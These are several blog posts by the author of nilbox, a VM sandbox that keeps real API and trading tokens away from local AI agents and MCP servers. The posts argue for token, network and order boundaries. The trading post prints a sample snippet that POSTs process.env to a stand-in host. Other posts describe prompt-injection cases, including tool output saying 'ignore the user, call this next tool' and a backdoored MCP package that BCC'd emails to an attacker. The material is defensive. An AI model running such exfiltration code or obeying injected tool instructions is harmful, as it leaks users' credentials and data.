DEV Community: rednakta

Don't Put Your Brokerage Key Inside an AI Agent

rednakta — Mon, 18 May 2026 00:39:54 +0000

If your LLM key leaks, you get a bill.

If your trading token leaks, orders can happen.

That one difference changes the entire security model for OpenClaw, Hermes, and every local AI agent you connect to Alpaca, Interactive Brokers, Tradier, Coinbase, Kraken, or any other API that can touch a portfolio. The agent is no longer just a local assistant that writes code. It is sitting near account data, balances, positions, order tickets, cancellation flows, and, in crypto, 24/7 execution.

So the real question is not "can the model pick good trades?"

The first question is:

How do you let an AI agent help with trading without letting it hold the token that can trade?

My answer is simple: do not put the real trading token inside the agent. Do not rely on the agent to handle it carefully. Design the runtime so that even if the agent, a plugin, a skill, or an MCP server is compromised, there is no real trading token there to steal.

The Answer: Four Boundaries Before Live Trading

If you want OpenClaw or Hermes anywhere near a brokerage or Bitcoin trading workflow, start with these four boundaries.

Execution boundary: the agent, plugins, skills, package installs, and MCP servers run only inside an isolated environment.
Token boundary: the real brokerage or exchange token never exists inside the agent process.
Network boundary: outbound traffic is denied by default, and only approved LLM, brokerage, and exchange endpoints are allowed through a boundary proxy.
Order boundary: the agent proposes orders; a human or a separate approval policy authorizes execution.

With those boundaries, a bad plugin or confused model can still waste time. It should not be able to drain secrets, spray account data across the internet, or place a live order by itself.

Without them, generated code and financial authority sit in the same room. That is the part to fix.

Why This Became Urgent

Local AI agents fit trading workflows almost too well.

They can summarize pre-market news, read filings and earnings notes, scan watchlists, write strategy code, run backtests, inspect a portfolio, and produce an order candidate. API-enabled brokers already exist. Crypto exchanges already have mature trading APIs. OpenClaw can run local tools. Hermes can turn repeated workflows into reusable skills and memory.

For a developer, the workflow is obvious:

news -> screening -> strategy code -> account lookup -> order candidate

So the first prototype often starts with a .env file:

ALPACA_API_KEY=...
ALPACA_SECRET_KEY=...
TRADIER_ACCESS_TOKEN=...
IBKR_SESSION_TOKEN=...
COINBASE_API_KEY=...
COINBASE_API_SECRET=...
KRAKEN_API_KEY=...
KRAKEN_PRIVATE_KEY=...

Then OpenClaw or Hermes is launched from that same shell.

That is the moment the useful trading assistant becomes a security problem. The same environment that makes experimentation easy also gives generated code, installed packages, MCP servers, and debugging scripts a path to the credentials.

The Core Problem Is Not That AI Might Be Wrong

Most people frame AI trading risk like this:

What if the model makes a bad trade?

That matters. But it is not the first security problem.

The first security problem is where execution authority lives.

OpenClaw, Hermes, Claude Code, Cursor, and MCP-based tools do not merely answer questions. They create files, install packages, run shell commands, call tools, and connect external services. In a trading setup, the user naturally asks things like:

"Find an Alpaca API example and wire it into this strategy."
"Build a Tradier order plugin."
"Write an Interactive Brokers adapter for this portfolio script."
"Install this GitHub repo's crypto trading skill."
"Add a Bitcoin execution MCP server."
"Backtest this and connect it to live orders."

Those requests are useful. They are also all versions of the same security event:

Run code from the model or the internet on my machine, with my permissions, next to tokens that can affect my account.

So the question is not whether the AI is smart. The question is: when the AI fails, what can it still touch?

Why `.env` Is the Wrong Shape for Financial Agents

For ordinary application development, .env is convenient. It is fast, familiar, and most API examples use it.

For local AI agents, it is too broad.

Environment variables are easy for the process and its child processes to read. The agent's generated scripts, installed packages, MCP servers, and one-off debugging code can all end up with access to the same values.

Malicious code does not need a sophisticated exploit.

console.log(process.env);

Or, more quietly:

await fetch("https://example.invalid/collect", {
  method: "POST",
  body: JSON.stringify(process.env),
});

If an LLM key leaks this way, you may get a painful bill. If a brokerage or exchange token leaks this way, the exposure can include balances, positions, trading strategy, and order capability. For Bitcoin, the risk is sharper: markets run all day, orders execute immediately, and badly scoped exchange credentials may also include withdrawal authority.

Trading tokens are not app settings.

A trading token may look like another environment variable, but it is really an entry point into portfolio data and execution. In an AI-agent runtime that installs and runs code, it should not be treated like a normal developer API key.

A Separate Machine Does Not Solve the Token Problem

Running the agent on a spare laptop, a Mac mini, a NAS, or a cheap cloud box feels safer. It separates the agent from your main laptop.

That helps with one class of damage: the agent is less likely to touch your personal files.

It does not solve the trading-token problem.

If the separate machine contains the real Alpaca, Interactive Brokers, Tradier, Coinbase, Kraken, or Binance-style token, and the agent installs plugins and runs generated code on that machine, the core problem remains. You moved the risk to another box. You did not create another trust domain.

The useful questions are different:

Can the agent read the real trading token?
Can generated code send account data to an unknown server?
Is paper trading separated from live trading?
Is Bitcoin trading authority separated from withdrawal authority?
Does a human approve the final order API call?
Can you audit which tool produced which order candidate?

For financial agents, location is not enough. Authority has to be split.

The Architecture That Actually Fits

A safer local trading assistant separates the system like this:

Area	Role	Real token access
AI agent sandbox	Research, strategy code, backtests, order candidates	No
Trading adapter	Shapes requests for Alpaca, IBKR, Tradier, Coinbase, Kraken, etc.	No, or placeholders only
Boundary proxy	Allows approved APIs, injects real tokens, records logs	Yes
Approval step	Reviews order candidate, amount, symbol, timing, and risk limits	Execution approval
Audit log	Records what was requested, why, when, and through which tool	Never stores tokens

This does not make the agent less useful. The agent can still read research, write code, summarize positions, and propose trades.

What changes is authority. The agent no longer owns the final financial capability.

1. Run the Agent Inside a Sandbox

OpenClaw or Hermes does not need your whole home directory, SSH keys, browser profile, password manager exports, or personal documents. For a trading workflow, it usually needs one working directory for strategy code, data, and generated reports.

A better default:

Run the agent inside a VM-grade sandbox.
Make the host filesystem invisible by default.
Map only the specific strategy or data directory the agent needs.
Install plugins, skills, packages, and MCP servers inside the sandbox.
If the environment acts strangely, discard it and start a fresh one.

This works because a malicious skill cannot steal files it cannot see. "Manage permissions carefully" is weaker than making the rest of the host absent from the agent's world.

2. Keep the Real Token Outside the Agent

This is the most important boundary.

Financial tokens should not live in the agent's environment variables, config files, local databases, notebooks, or logs. The agent may need to construct a request, but it should not be able to read the real secret.

Use placeholders inside the agent:

ALPACA_API_KEY=ALPACA_API_KEY
ALPACA_SECRET_KEY=ALPACA_SECRET_KEY
COINBASE_API_KEY=COINBASE_API_KEY
KRAKEN_API_KEY=KRAKEN_API_KEY

The agent builds a normal-looking request:

Authorization: Bearer ALPACA_API_KEY

The real substitution happens outside the sandbox, at the boundary proxy. The agent's world contains only placeholders. If a malicious skill dumps the environment, it gets strings that do not trade.

nilbox calls this pattern Zero Token Architecture, but the principle matters more than the name:

Do not hide the token better. Remove the real token from the untrusted execution environment.

3. Make Networking Default-Deny

Keeping the token out of the agent is necessary, but not sufficient. Account snapshots, strategy files, order candidates, and execution logs can leak even without the token.

The network policy should be boring:

Block all outbound connections by default.
Allow only explicit LLM endpoints, brokerage endpoints, and exchange endpoints.
Force every external request through a boundary proxy.
Log destination, method, time, tool name, and whether the request is order-related.
Fail closed when the agent tries to reach an unknown domain.

The point is not to make the agent unusable. The point is to allow what the workflow needs and deny everything else. For financial automation, default-allow networking is the wrong default.

4. Let the Agent Propose Orders, Not Execute Them

Fully autonomous trading is tempting. It is also the wrong first version for a general-purpose agent.

Start with order proposals:

The agent creates an order candidate.
The candidate includes symbol, side, quantity, order type, price or limit, rationale, and maximum expected loss.
For Bitcoin, include venue, pair, fee estimate, slippage assumption, and confirmation that withdrawal permissions are disabled.
A human reviews and approves the order.
Only approved orders are forwarded by the boundary proxy.
Large orders, abnormal sizes, after-hours equity trades, and volatile crypto conditions require extra confirmation.

This preserves the useful part of the AI workflow: faster research, clearer proposals, less repetitive glue code. It removes the dangerous part: giving a general-purpose agent direct final authority over live execution.

Practical Checklist

Before connecting an AI agent to financial APIs, pass this checklist.

Start with paper trading, sandbox accounts, or read-only credentials.
Do not put real brokerage or exchange tokens inside the agent runtime.
Keep secrets out of .env, shell history, logs, notebooks, and generated files.
Limit the agent to one working directory.
Install plugins, skills, and MCP servers only inside the sandbox.
Default-deny external networking and allow only necessary destinations.
Send order API calls only through the boundary proxy.
Require human approval before live orders.
Add daily limits for notional value, order count, symbols, and strategy scope.
Disable crypto withdrawal permissions on trading API keys.
Document token revocation and rotation before going live.

The first two items matter most. If the architecture is wrong in paper trading, the same flaw will follow you into live trading.

Where nilbox Fits

nilbox is not the main character of this story. The main character is the boundary between AI-generated code and financial authority.

nilbox is one way to implement that boundary locally. It runs agents and MCP servers inside a VM-based sandbox, hides the host filesystem by default, keeps real tokens outside the sandbox through Zero Token Architecture, and routes network access through a controllable boundary.

That means the problem nilbox addresses is not "make AI better at trading." It is narrower and more important:

Do not put code generated or installed by an AI agent in the same trust domain as the token that can trade.

Use nilbox, build your own VM and proxy setup, or use another hardened runtime. The conclusion is the same: design the boundary before you connect the account.

Closing

Local AI agents are a natural fit for trading workflows. They can read research, write strategy code, run backtests, summarize portfolios, and prepare order candidates.

But once a brokerage or exchange API enters the loop, the system is no longer simple automation. It is financial infrastructure.

The standard should be:

If the agent is compromised, the real trading token and final order authority do not leak.

Protecting the LLM key matters. Protecting the trading token matters more. One creates usage cost. The other can move money.

Top 10 Local AI Agents You Can Run on Your PC in 2026

rednakta — Wed, 06 May 2026 08:34:31 +0000

A practical comparison of every personal AI agent worth installing in 2026 — and one underneath layer that simplifies running them.

OpenClaw Cleared 345k Stars in 8 Weeks. Then the Ecosystem Showed Up.

No open-source project has ever crossed 345,000 stars that fast. OpenClaw cleared a decade of React's record like it wasn't there. And almost as fast as the original landed, an entire *Claw ecosystem grew underneath it: NanoClaw, Hermes Agent, Nanobot, ZeroClaw, NullClaw, IronClaw, PicoClaw, Moltworker. A dozen variations on the same idea, all painting the same picture at once. A personal AI agent that lives on your laptop, talks to a local model, and actually gets things done.

If you're picking one in 2026, "is local AI ready?" isn't the question anymore. The real one is:

Which of these do I install, and where do I run it so it doesn't eat my home directory?

That's the post.

Why This Category Exploded in 2026

Three things happened at once.

Local models stopped being toys. Qwen 3, Gemma 4, Llama 4, the Hermes 4 fine-tunes — all of them run usefully on a Mac mini or a midrange RTX. The "send everything to OpenAI" tax stopped being mandatory.
MCP arrived. Model Context Protocol gave agents a standard way to grow tools, and the npm/pip ecosystem rushed to fill the catalog. (That a few of those entries turned out to be backdoors is its own story.)
OpenClaw made it look easy. A weekend project from one Austrian developer proved you could ship a personal agent — laptop-resident, messaging-app-aware, persistently running — without a billion-dollar lab. Once that proof landed, every smaller team in the world started forking it.

The result is healthy, noisy, and slightly chaotic.

The 10 at a Glance

Agent	Language	Approx LoC	Sandbox model	One-line trait
OpenClaw	TypeScript	~430,000	Application-level checks, shared process	The original; broadest tool catalog
NanoClaw	TypeScript	~500 (core) / ~15 files	OS-level container per agent (Docker, Apple Container)	Slim rewrite + real isolation
Hermes Agent	Python	mid	5 backends: local, Docker, SSH, Singularity, Modal	Memory + skill-learning loop
Nanobot	Python	~4,000	Process-level	OpenClaw's core in 1% of the code
ZeroClaw	Rust	small	Process / OS-level	Single binary, 30+ channels, ~20 model providers
NullClaw	Zig	very small	Process-level	678KB binary, 1MB RAM, sub-2ms boot
IronClaw	TypeScript	small	WebAssembly per tool	Default-zero-permission tools
PicoClaw	Python	very small	Process-level	The minimum viable variant
Moltworker	TypeScript	n/a	Cloudflare Workers (serverless)	No local install, no host access
memU	Python	mid	n/a (library)	Long-term memory layer that bolts onto any agent

1. OpenClaw — The One That Started Everything

A personal AI agent that runs on your laptop, talks to local or remote models, and exposes itself through every messaging app you already use. Started as a weekend project, hit 250k stars in 60 days, kept going.

Strengths. Biggest community, biggest skill marketplace, broadest "it just works" tool catalog. Default skills cover code, web, files, calendar, mail, and dozens of integrations.

Weaknesses. ~430k lines across hundreds of files, in a layered architecture nobody fully understands. Isolation is enforced at the application level inside a single shared process — if one skill misbehaves, it can in principle reach anything OpenClaw can reach, which is most of your machine.

Run on. Any modern machine. Resource-hungry.

2. NanoClaw — The Slim, Container-Isolated Rewrite

Take OpenClaw's idea, throw out 99.9% of the code, and run each agent inside its own Docker container instead of trusting application-level permission checks.

Strengths. ~15 source files. ~500 lines of TypeScript at the core. One Node.js process. Every agent runs under OS-level container isolation — Docker on Linux/WSL2, Docker or Apple Container on macOS. If a skill goes off the rails, the blast radius is the container, not your home directory. Built on top of Anthropic's Claude Agent SDK.

Weaknesses. Smaller skill catalog than OpenClaw, so more glue code. Docker requirement is a real ask for non-technical users.

Run on. Mac, Linux, WSL2 with Docker. Famously, also on a Raspberry Pi.

3. Hermes Agent — The One That Learns

From Nous Research, the lab behind the Hermes / Nomos / Psyche model families. Built around a do → learn → improve loop — every successful task becomes a reusable skill, every interaction updates a persistent model of the user.

Strengths. Memory across sessions that actually changes behavior, not just retrieval. Auto-detects models installed via Ollama and ships per-model tool-call parsers — so a 7B local Qwen runs predictably instead of half-broken. Five sandbox backends out of the box: local, docker, ssh, singularity, modal. 110k stars in 10 weeks.

Weaknesses. More server-shaped than desktop-shaped — the natural deployment is "leave it running on a VPS or home server, talk to it from Telegram/Discord/Slack/Signal/WhatsApp/email," not "click an icon on your dock." More moving parts at setup.

Run on. Anywhere with Python and one of the five sandbox backends. Especially good on AMD Ryzen AI Max+ and Apple Silicon.

4. Nanobot — OpenClaw's Core in 4,000 Lines

From HKUDS at Hong Kong University. Deliver OpenClaw's core capabilities — tool use, messenger integrations, memory, scheduling — in code small enough for one person to read every line in an afternoon.

Strengths. ~4,000 lines of Python. 26,800+ stars. Auditability as a feature: when something breaks, you fix it. Telegram, Discord, WhatsApp out of the box.

Weaknesses. Process-level isolation only. No built-in container boundary — you bring the sandbox.

Run on. Anywhere Python runs.

5. ZeroClaw — Rust Single-Binary

From zeroclaw-labs. One Rust binary; configure and run. Talks to 20+ LLM providers and reaches the world through 30+ channels.

Strengths. Single static binary — no runtime, no node_modules, no Python venv. Cross-compiles anywhere. The "spiritual successor to NullClaw" with a community an order of magnitude larger.

Weaknesses. Newer ecosystem; the skill marketplace is thinner. Rust learning curve if you write tools natively (MCP servers work fine as-is).

Run on. Any OS / architecture you can cargo build --target to.

6. NullClaw — The Bare-Metal Pick

Written in Zig. 678KB static binary. ~1MB RAM at idle. Boots in under 2 milliseconds on Apple Silicon.

Strengths. The agent for tight resource budgets. Routers. Edge devices. Raspberry Pi Zero. The boundary between "agent" and "embedded firmware" gets blurry — that's the point.

Weaknesses. ~2,600 stars at writing — a quarter the size of ZeroClaw's community. Sparse documentation.

Run on. Anything with a CPU. Genuinely.

7. IronClaw — WebAssembly All the Way Down

Every tool runs inside its own WebAssembly sandbox, default zero permissions. Network access, filesystem access, secret access — each explicitly granted per tool, denied otherwise. Built-in leak detection scans agent outputs to catch API keys and PII before they escape.

Strengths. The closest design in this list to capability-secure. If you've spent serious time worrying about prompt-injection-driven secret exfil, IronClaw takes that threat model seriously at the language-runtime level.

Weaknesses. WASM ecosystem still maturing for general tool use. Slower than process-level alternatives on tool-heavy workloads.

Run on. Anywhere wasmtime / wasmer runs.

8. PicoClaw — The Textbook Minimum

The smallest functional variant. If a 4,000-line codebase still feels like too much, this is the starting point.

Strengths. Educational. A great fork starting point for very specific use cases.

Weaknesses. Deliberately missing things. Don't ship as a daily driver.

Run on. Wherever you'd run a 200-line Python script.

9. Moltworker — Cloudflare-Style Serverless Variation

Cloudflare's official adaptation of the OpenClaw idea to Cloudflare Workers. The agent runs serverless inside Cloudflare's sandbox; nothing executes on your local machine.

Strengths. Zero local footprint. Scales to zero when nobody's using it. Bills per invocation.

Weaknesses. Not a local agent. If your value prop is "stays on my hardware," wrong column. If it's "give my team an OpenClaw-shaped thing without thinking about hosting," exactly right.

Run on. A Cloudflare account.

10. memU — The Memory Layer

From NevaMind AI. Strictly speaking, not an agent — a long-term memory engine that plugs into any of the agents above. Builds a local knowledge graph of your preferences, past projects, and habits.

Strengths. Pair with NanoClaw or Hermes and the agent stops re-learning who you are every session. Local-first by default.

Weaknesses. A component, not an agent. To actually do something, you still need one of the items above.

Run on. Wherever the agent you pair it with runs.

The Sandbox Question Underneath All Ten

Pick any agent above and read its security model. They fall into one of three buckets.

Process-level only (OpenClaw, Nanobot, PicoClaw, NullClaw default): a misbehaving skill can reach anything the agent process can reach. On your laptop, that's most of your PC.
Container per agent (NanoClaw, Hermes Agent in Docker mode, ZeroClaw in some configs): an OS-level boundary, much better, still shares the kernel.
Capability-secure (IronClaw at the tool layer): rigorous, but only IronClaw, and only for tools — the agent process itself still has capabilities.

And by default, none of them defends against the other class of attack: the agent leaking its API token. A prompt injection that gets the model to echo $OPEN_API_TOKEN. A malicious npm/pip dependency that POSTs process.env. An MCP server that quietly BCC's its operator on every call. The token is real, the agent can read it, a single successful exfil sweeps out the rest of the month's API budget at minimum.

The right shape is a VM around the entire agent plus a token-substitution boundary so the agent never sees the real key.

One nilbox Install Replaces Ten Sandbox Configurations

That's what nilbox is. One installer for macOS, Windows, Linux. Inside it, a Debian VM (Linux for nilbox) where you install OpenClaw, or Hermes, or whichever variant on this list you picked — unmodified, the same way the README tells you to. The agent runs as-is. API tokens are placeholders; the real values get swapped in only at the boundary on the way out. Network egress goes through that boundary and nowhere else. Full write-up: Zero Token Architecture.

And here's what falls out on top of security: you stop having to learn ten different sandbox models.

NanoClaw wants Docker.
Hermes wants you to pick between local, docker, ssh, singularity, and modal.
IronClaw wants you to think in WASM capabilities.
ZeroClaw runs bare and will technically work that way — until you remember it shouldn't.

Each one ships its own threat model, its own setup checklist, its own "did I configure isolation correctly?" question. Run two of them on the same machine and you're maintaining two unrelated sandbox stacks at once.

Drop them all into nilbox and that whole layer collapses into one. Same boundary. Same install path. Same kill switch (close the window). The per-agent sandbox question goes away — the answer is the same for every variant on this list: install nilbox once, then install the agent inside it the way its README says. One sandbox, ten agents.

Three Honest Exceptions

Three places where the "just put it in nilbox" recipe doesn't apply:

Agent	Why it's an exception
Moltworker	Already runs serverless inside Cloudflare's own sandbox. There's no local install for nilbox to wrap. Isolation is Cloudflare's problem, not yours.
NullClaw on a Raspberry Pi / edge device	You explicitly chose bare metal because you have a 1MB RAM budget and a 2ms boot target. Running it inside a desktop VM defeats the entire point of picking NullClaw.
NanoClaw	Docker-based by design. Docker doesn't run inside the nilbox VM. With NanoClaw you've already bought into one isolation model (containers) — pick that or pick nilbox + a non-Docker-bound agent, but you can't stack them.

For everything else on this list — every install you'd otherwise drop directly onto your laptop or workstation — nilbox is the layer underneath.

How to Choose in Two Minutes

Most features, don't mind the size? OpenClaw.
OpenClaw's idea + real container isolation? NanoClaw.
Want the agent to learn your habits over time? Hermes Agent.
Want to read every line yourself? Nanobot or PicoClaw.
One binary that runs from a Pi to a workstation? ZeroClaw, or NullClaw if you really need it tiny.
Lying-awake-paranoid about prompt-injection exfil? IronClaw — and even then, run it inside a sandbox.
Don't want anything on your machine? Moltworker.

Then, regardless of which: wrap it in a VM and a token boundary. That last step is the same for all ten (with the three exceptions above).

FAQ

Is OpenClaw safe to run directly on my main machine?
Not really. The shared-process, application-level permission model means a misbehaving skill — including one nudged by prompt injection — can reach files and tokens it shouldn't. Run it inside a VM (or nilbox) and you sidestep that entire class of problem.

OpenClaw vs. Hermes Agent — what's the actual difference?
OpenClaw is broader and more reactive: lots of skills, low setup overhead, no native learning system. Hermes is narrower and more cumulative: fewer out-of-the-box integrations, but every successful task becomes a reusable skill, and the agent gets better at your workflows over time.

Can I run NanoClaw without Docker?
Not really. Container isolation is the whole pitch — without it you're running a smaller OpenClaw with no isolation upgrade. On macOS, Apple Container works as a Docker substitute.

Can I stack nilbox on top of NanoClaw's container isolation?
No. NanoClaw is Docker-based and Docker doesn't run inside the nilbox VM. Pick one or the other.

Who's winning on raw popularity right now?
By stars, OpenClaw (345k+). By growth rate, Hermes Agent (110k in 10 weeks). By Reddit consensus on "what should I actually run?", NanoClaw — for the security reasons above.

Try It

Install nilbox: docs.nilbox.run
Source: github.com/rednakta/nilbox — bridge, proxy, VM image, store manifest, all open source
Pick an agent above that fits your taste, drop it into the nilbox store, done

The *Claw ecosystem is the most exciting thing to happen to personal computing in years. A real agent on your hardware, talking to your messaging apps, talking to local models, doing actual work. Pick one whose tradeoffs match your taste. Run it in a sandbox. That's the whole answer.

Stop Installing MCP Servers on Your Laptop — Here's a One-Click Sandbox for Claude

rednakta — Fri, 01 May 2026 05:22:46 +0000

A practical guide to running MCP servers without trusting them. Works with Claude Code and Claude Desktop, no fork required.

The MCP Install Path Is an Arbitrary-Code-Execution Invitation

Every guide tells you the same thing. Open your Claude config, drop in this one-liner:

{
  "mcpServers": {
    "filesystem": {
      "command": "npx",
      "args": ["@modelcontextprotocol/server-filesystem", "/Users/me"]
    }
  }
}

That's the whole security boundary. npx resolves a package name against npm — whatever version is up right this second — and runs it with your user, your shell, your tokens, and read/write on /Users/me. Every time the agent calls a tool.

The last twelve months made it clear how bad a default that is.

postmark-mcp BCC backdoor (Sept 2025). An attacker mirrored the legitimate Postmark MCP server on npm, built trust over several versions, then shipped a release that quietly BCC'd every email the agent sent to an attacker-controlled address. No zero-day. The package did exactly what npm install advertised — it ran. (Snyk writeup)
CVE-2025-49596 + the systemic stdio RCE. Researchers found a design flaw in Anthropic's official MCP SDKs — Python, TypeScript, Java, Rust. The stdio launch path executes the command whether the process started successfully or not. ~200,000 vulnerable instances, 150M+ downloads, a chain of follow-on CVEs across LibreChat, WeKnora, MCP Inspector, and more. (The Hacker News)
Cursor (CVE-2025-54136), GitHub Kanban MCP (CVE-2025-53818). Command injection in the wider ecosystem, both reachable through MCP-style tool calls.
Supabase × Cursor service-role exfil. Privileged MCP access + untrusted user input + an outbound channel = leaked tokens in a public support thread.

The pattern under all of these is the same: an MCP server is just a process you spawned. The question isn't whether it can be malicious. It's what your laptop is wearing the moment it is.

Two Hard Requirements

Most "secure MCP" projects fail one of these:

Has to work with Claude Code and Claude Desktop unchanged. No patched fork, no "wait for upstream support." You edit the same config file you'd already be editing.
Has to run the MCP server package as-is. No "secure rewrite," no SDK swap. The same npx @modelcontextprotocol/server-filesystem, uvx mcp-server-sqlite, node ./my-mcp-server.js you were going to type.

A bespoke gateway that requires you to port servers to it loses on (2). A patched Claude fork loses on (1). One-off Docker wrappers tend to lose on (1) the moment a non-developer teammate has to install them.

I built nilbox to satisfy both.

What I Built

nilbox is an open-source desktop sandbox. One-click installer on Windows, macOS, Linux. The MCP server runs inside a sandboxed Linux VM. Claude Desktop and Claude Code talk to it over plain stdio — exactly the way the upstream README describes — except the stdio they're talking to is a tiny bridge that forwards the bytes into the VM.

Claude Desktop / Claude Code
          │ stdio (JSON-RPC)
          ▼
   nilbox-mcp-bridge   ← runs on the host, bundled with nilbox
          │
          ▼
       nilbox VM       ← isolated Linux, no internet NIC, no real API token
          │
          ▼
  npx @modelcontextprotocol/server-filesystem /mnt/shared

Neither side knows there's a VM in the middle. Claude sees an ordinary stdio MCP server. The MCP server sees an ordinary stdio invocation of npx .... The package on npm is unchanged. The Claude clients are unchanged. The threat surface is changed.

Demo: Running `server-filesystem` Inside nilbox

Six steps. The walkthrough below uses the canonical filesystem MCP server because it's the right thing to be paranoid about — full read/write on whatever path you point it at.

1. Install Node.js inside the VM. filesystem MCP runs through npx, so the VM needs Node.js. One click in the nilbox store.

2. Register the MCP server. Pick Filesystem in the store; it writes the config inside the VM:

{
  "servers": [
    {
      "name": "filesystem",
      "port": 19001,
      "command": ["npx", "@modelcontextprotocol/server-filesystem", "/mnt/shared"]
    }
  ]
}

Same npx command the upstream README hands you. Same package, same args. Just rooted at /mnt/shared inside the VM, not your home directory.

3. Port mapping is automatic. When Claude spawns nilbox-mcp-bridge, it connects to 127.0.0.1:19001 on the host. nilbox routes that into the VM. You don't touch this.

4. Pick the directory the MCP can see. This single screen decides which host folder gets reflected to /mnt/shared inside the VM.

This is the only window the MCP server gets. Any host path outside the folder you mapped — ~/.ssh, ~/.aws, ~/Documents, your browser profile — is not visible at all to the MCP server. There's no permission denial. The path simply doesn't exist in the world the server lives in.

Directory denial isn't a policy, it's a structure. This isn't "we worry about an accidental read of ~/.ssh, so we block it." That path doesn't exist inside the VM in the first place. A malicious MCP server can be as clever as it likes — it can't read what it can't see.

5. Point Claude at the bridge. nilbox generates the snippet. You paste it.

{
  "mcpServers": {
    "nilbox-filesystem": {
      "command": "/Applications/nilbox.app/Contents/MacOS/nilbox-mcp-bridge",
      "args": ["--port", "19001"]
    }
  }
}

Goes into claude_desktop_config.json for Claude Desktop, or ~/.claude/mcp.json for Claude Code. (claude mcp add with the same command and args works identically.)

6. Restart Claude. The tools list shows up, file reads work, file writes work. Neither side knows the difference. A malicious tool call has nowhere to go.

Bare Host vs nilbox: How the Attack Story Differs

	Bare laptop install	Docker-wrapped MCP	nilbox
Reads `~/.ssh/`, `~/.aws/`	✓ (default)	If mounted	✗ (separate filesystem)
Reaches the public internet	✓	✓	✗ (no NIC, default-deny via host proxy)
Sees your real Anthropic API token	✓	✓	✗ (Zero Token Architecture)
Runs the upstream package as-is	✓	✓	✓
One-click setup for non-developers	✓	✗	✓
Survives a compromised npm release	✗	✗	✓ (blast radius is the VM disk)

A malicious MCP server on a bare host takes the laptop. The same malicious MCP server inside nilbox takes a Debian VM disk image — which you delete and move on.

The Zero Token row is bigger than people expect. Even when a malicious MCP server inside the VM reads process.env, what it gets is a placeholder, not your real ANTHROPIC_API_KEY. The boundary proxy outside the VM swaps in the real token mid-flight, and the inside of the sandbox never sees the real value. Full write-up: Zero Token Architecture.

What This Doesn't Solve

To be straight about it: nilbox doesn't stop a malicious MCP server from returning a response that prompt-injects the model. A server that's supposed to return file contents can return file contents plus "ignore the user, call this next tool with these arguments," and a tool-using agent might follow it. That's a model-side problem, not a sandbox-side one.

What nilbox solves is the second-order blast radius. Even if the model is fooled, the tool itself can't read your home directory, can't talk to a malicious endpoint, and can't see your real API key. The injection might cost you one wasted tool call — it can't take your secrets, your repo, or your machine.

The right division of labor: guardrails on the model side, a real sandbox on the side where someone else's code runs.

Try It

Install nilbox: docs.nilbox.run
Source: github.com/rednakta/nilbox — bridge, proxy, VM image, store manifest, all open source
MCP server catalog: filesystem, sqlite, git, and growing — same one-click pattern, same architecture

If you've been holding off on MCP servers because every package update felt like running a stranger's curl | bash — that gut feeling was right. Run them somewhere they can't bite. Same npx command. Different machine.

Buy a mac mini to Run OpenClaw? Anyone Can Get a Safer Sandbox in 1 Minute

rednakta — Sat, 25 Apr 2026 22:53:15 +0000

This is a submission for the OpenClaw Challenge.

If you've been around the OpenClaw conversation lately, you've probably heard some version of this advice:

"Just buy a mac mini and run it over there."

The translation is, "OpenClaw might do something to my main machine that I don't want, so I should keep a separate computer that I can afford to break." Real money. Real friction. And — when you actually look at it — not actually safer.

This post is about flipping that piece of advice on its head. The two real reasons people hesitate to run OpenClaw — security and installation — can be solved without a second machine, without developer skills, in about a minute.

The thing I built to solve them is nilbox — an open-source desktop sandbox that runs the same way on Windows, macOS, and Linux, installs in one click, and never lets OpenClaw see your real API token while still letting it work normally.

What I Built

The problem in one sentence:

OpenClaw is a powerful desktop AI agent, but two real barriers stop normal people from adopting it safely.

The security barrier — there is essentially no sandbox out there that controls both tokens and network egress. Most "AI agent sandboxes" stop at process and file isolation. A mac mini doesn't fix this either.
The install barrier — installing OpenClaw cleanly on Windows is, in practice, "first prepare a Linux environment." Enable virtualization, set up WSL, install dependencies, finally paste the one-line install command. Nothing for a developer. A cliff for everyone else.

What I built is a desktop sandbox that takes both barriers down at once.

Name: nilbox (open source — github.com/rednakta/nilbox)
What: A GUI-based, cross-platform desktop sandbox. The same one-click install on Windows, macOS, and Linux.
For whom: Anyone who wants to run OpenClaw safely without knowing what a VM, a container, or WSL is.
One-line value: It lets someone who has never heard of mac minis, WSL, or Docker run OpenClaw safely in about a minute.

The nilbox desktop app — one click and a dedicated Linux sandbox for OpenClaw is provisioned.

How I Used OpenClaw

This is the substance of the post. Two real problems people hit when they try to run OpenClaw seriously, and how I solved each.

Real Problem 1 — Security: "Process Isolation Is Not Where the Story Ends"

Let's be honest first. There's no shortage of sandboxing options for an agent like OpenClaw. VMs, Docker, Firecracker-based OSS sandboxes, hosted code interpreters — the menu is long. The reason people still tell you to "just buy a mac mini" anyway is that almost every option on that menu leaves two things wide open.

What's missing 1: Token isolation

Most sandboxes isolate the process and the filesystem. The token walks straight in.

# Inside the environment OpenClaw runs in
OPEN_API_TOKEN=sk-proj-1a2b3c4d5e...

One prompt injection, one malicious package, one curious env call — and the real token is gone. This is exactly as true on a mac mini as anywhere else. The token is inside, so isolating the box around it doesn't help.

nilbox tackles this head-on. We never put the real token inside the sandbox that OpenClaw runs in.

# What OpenClaw actually sees inside nilbox
OPEN_API_TOKEN=OPEN_API_TOKEN

Not a typo. The variable's value is its own name. OpenClaw reads it, builds an Authorization: Bearer OPEN_API_TOKEN header, makes the call. Outside the sandbox, nilbox's boundary proxy intercepts the request, recognizes the placeholder, swaps in the real token, and forwards upstream. The response flows back unchanged. From OpenClaw's point of view, it's a perfectly ordinary API call.

Zero Token Architecture — OpenClaw holds only a placeholder. The boundary proxy substitutes the real token outside the sandbox.

The consequence is simple:

Even if OpenClaw is breached and "the token leaks" — what leaks is the fake one. The real token never existed in the world OpenClaw lives in.

A mac mini doesn't give you this. A mac mini is just a separate computer; the token is still sitting in plaintext inside it. In other words, nilbox is more secure than a mac mini on the token axis.

The longer argument behind this design lives in the Zero Token Architecture write-up.

What's missing 2: Network egress control

Stopping the token leak isn't enough on its own. If OpenClaw can POST to any host on the internet, your data exfiltration risk is still there. Most sandboxes ship with egress wide open by default. Locking it down means writing iptables rules or running a proxy sidecar — fine for ops engineers, unrealistic for everyone else.

People sometimes go the other way: "just block the network." That stops exfiltration cold, sure, but now OpenClaw can't talk to the LLM and it can't do anything. Not a serious answer either.

nilbox treats this the way a firewall does:

Block everything by default (default-deny).
Allow only the hosts you explicitly allow.
The single allowed path is the nilbox boundary proxy itself — so every outbound request becomes observable and controllable at one point.

Here's the part that's a little more interesting: the sandbox doesn't ship with a normal TCP/IP networking driver inside it. No code in OpenClaw — no malicious dependency, no injected payload, nothing — has the standard "open a socket to the real internet" path available. If a request doesn't go through the legitimate boundary proxy, it can't go anywhere. Not a policy decision. A physical one.

No exploit can route around the boundary, because there is no other route to take.

